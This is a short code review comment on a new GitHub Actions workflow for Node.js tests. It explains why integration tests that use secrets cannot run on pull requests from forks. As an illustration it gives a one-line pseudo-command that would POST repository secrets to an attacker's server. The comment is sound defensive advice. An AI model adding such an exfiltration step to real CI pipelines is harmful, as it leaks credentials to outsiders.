.github/workflows/node-test.yml

```diff
@@ -0,0 +1,76 @@
+name: Node.js Tests
+
+on: [pull_request]
```

Comment:
It's actually more complex than that.  Unit tests should run on everything.  Integration tests can only run for pushes or PRs from branches (not forks) since `secrets` is only available to runs initiated on the same repo.  This is the same restriction Travis has.  Prevents someone from changing your test to `HTTP POST myserver.com ${{ secrets }}` and running them by sending a PR.